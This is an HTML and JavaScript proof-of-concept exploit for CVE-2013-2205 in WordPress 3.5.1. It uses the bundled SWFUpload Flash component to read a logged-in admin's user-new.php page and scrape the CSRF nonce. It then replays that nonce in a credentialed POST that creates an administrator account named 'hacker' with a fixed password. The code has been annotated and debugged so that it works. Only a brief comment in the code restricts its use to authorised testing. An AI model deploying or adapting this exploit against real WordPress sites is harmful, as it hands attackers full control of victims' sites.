Wordpress 3.5.1 + swfupload CSRF attack
<html>
<head>
<script type="text/javascript" src="http://wordpress-url/wp-includes/js/swfupload/swfupload-all.js"></script>
<script type="text/javascript">
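var swfu;

/*
 * Bootstraps SWFUpload once the page has loaded.
 *
 * Why this is a CSRF (CVE-2013-2205, named in the page text below):
 *  - The SWFUpload JavaScript (the <script src> above) and the flash_url
 *    below are both fetched from the TARGET WordPress install, so the Flash
 *    movie runs in the target's origin, not the attacker's.
 *  - upload_url points the "upload" at wp-admin/user-new.php. The victim's
 *    wp-admin cookies ride along (browser/Flash permitting), and SWFUpload
 *    hands the HTTP response body back to this page as serverData via
 *    upload_success_handler - effectively a cross-origin read of an
 *    authenticated admin page.
 *  - myUploadSuccessHandler scrapes the create-user nonce out of that body and
 *    addUser() replays it. The nonce is WordPress's CSRF token, so obtaining
 *    it this way defeats the protection.
 *
 * Every "http://wordpress-url" (script src, flash_url, upload_url, and the
 * one in addUser) must be replaced with the base URL of the SAME install; the
 * same-origin trick only works if the SWF and the admin page share an origin.
 * Hosting this page creates an administrator on whatever install it is
 * pointed at - only use it on systems you are authorised to test.
 */
window.onload = function () {
  var settings = {
    flash_url: "http://wordpress-url/wp-includes/js/swfupload/swfupload.swf",
    // Fixed: this read "wordlress-url" (typo), which sent the upload to a
    // different host and broke the whole chain.
    upload_url: "http://wordpress-url/wp-admin/user-new.php",
    // The file content is irrelevant to user-new.php; accept anything small.
    file_size_limit: "5 MB",
    file_types: "*.*",
    file_types_description: "All Files",
    file_upload_limit: 100,
    file_queue_limit: 0,
    // Element ids that no handler on this page reads; kept for parity with
    // the stock SWFUpload sample settings.
    custom_settings: {
      progressTarget: "fsUploadProgress",
      cancelButtonId: "btnCancel"
    },
    // SWFUpload's own debug logging; noisy, but left as the author had it.
    debug: true,
    // Button settings (the Flash button is rendered into spanButtonPlaceHolder)
    button_width: "65",
    button_height: "29",
    button_placeholder_id: "spanButtonPlaceHolder",
    button_text: "CLICK",
    button_text_style: ".theFont { font-size: 16; }",
    button_text_left_padding: 12,
    button_text_top_padding: 3,
    // Upload as soon as a file is chosen; the response body is what we want.
    file_dialog_complete_handler: startUpload,
    upload_success_handler: myUploadSuccessHandler
  };
  swfu = new SWFUpload(settings);
};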
/**
 * SWFUpload file_dialog_complete_handler: kicks off the upload as soon as the
 * user has picked a file. `swfu` is the SWFUpload instance created in
 * window.onload.
 */
function startUpload() {
  var uploader = swfu;
  uploader.startUpload();
}
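/*
 * Matches the create-user nonce field rendered by wp-admin/user-new.php, e.g.
 *   <input type="hidden" id="_wpnonce_create-user" name="_wpnonce_create-user" value="0123456789" />
 * Group 1 is the nonce. The hex-only class is what the original PoC used; it
 * also stops the neighbouring _wp_http_referer value (a path) from matching.
 */
var CREATE_USER_NONCE_RE = /_wpnonce_create-user[^>]*\bvalue="([a-fA-F0-9]+)"/;

/**
 * Returns the create-user nonce found in a user-new.php response body, or
 * null when the field is not present.
 * @param {string} serverData raw HTTP response body handed over by SWFUpload
 * @returns {string|null}
 */
function extractCreateUserNonce(serverData) {
  var m = CREATE_USER_NONCE_RE.exec(String(serverData));
  return m ? m[1] : null;
}

/**
 * SWFUpload upload_success_handler: scrapes the create-user nonce out of the
 * response body (the victim's authenticated user-new.php page) and hands it
 * to addUser(). The third and fourth SWFUpload arguments are not used.
 *
 * Fixed vs. the original: it iterated the array with for...in through an
 * implicit global, and whenever a line contained the field name but the
 * value="..." pattern did not match it called addUser() with the whole line
 * as the "nonce". Now nothing is sent unless a real nonce was found.
 */
function myUploadSuccessHandler(file, serverData, c, d) {
  var nonce = extractCreateUserNonce(serverData);
  if (nonce === null) {
    return;
  }
  addUser(nonce);
}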
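/**
 * Replays the scraped nonce in a credentialed POST to user-new.php that
 * creates a new user. The field names are those of the WordPress 3.5.1
 * "Add New User" form; role=administrator is what turns this into a full
 * site takeover rather than a nuisance account.
 *
 * @param {string} nonce value of _wpnonce_create-user scraped from the page
 */
function addUser(nonce) {
  // Fixed: was an implicit global (`xmlhttp = ...`), which throws in strict mode.
  var xmlhttp = new XMLHttpRequest();
  xmlhttp.open("POST", "http://wordpress-url/wp-admin/user-new.php", true);
  xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  // A real boolean, not the string "true" (which only worked by being truthy).
  // Credentials are the whole point: the victim's wp-admin cookies ride along.
  xmlhttp.withCredentials = true;
  // Fixed: the alert used to fire right after send(), before the request had
  // completed, so it said "Thank you" even when nothing had been created.
  xmlhttp.onload = function () {
    alert("Thank you. :-)");
  };
  // NOTE(review): _wp_http_referer is hard-coded to the author's lab path
  // (/wordpress/wordpress3.5.1/...). Presumably WordPress only uses it for the
  // post-submit redirect rather than validation - confirm; if so it is
  // harmless, otherwise it must match the target's wp-admin path.
  // The nonce is hex by construction, so encodeURIComponent is a no-op guard.
  xmlhttp.send(
    "action=createuser&_wpnonce_create-user=" + encodeURIComponent(nonce) +
    "&_wp_http_referer=%2Fwordpress%2Fwordpress3.5.1%2Fwp-admin%2Fuser-new.php" +
    "&user_login=hacker&email=hacker%4032s.pl&first_name=hacker&last_name=hacker" +
    "&url=lol&pass1=qwerty1234&pass2=qwerty1234&role=administrator&createuser=Add+New+User+"
  );
}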
</script>
</head><body>
<div id="content">
<br>WordPress 3.5.1 + SWFUpload CVE-2013-2205 Exploit<br>
<br>Bug found by <a href="http://szgru.website.pl/">Szymon Gruszecki</a>
<br>Exploit by <a href="http://ropchain.org">Jakub Zoczek</a>
<hr>
<br>Choose any file to make the magic happen ;-) (the file itself is not used; it only triggers the SWFUpload request)
<br><span id="spanButtonPlaceHolder"></span>
</div>
</body></html>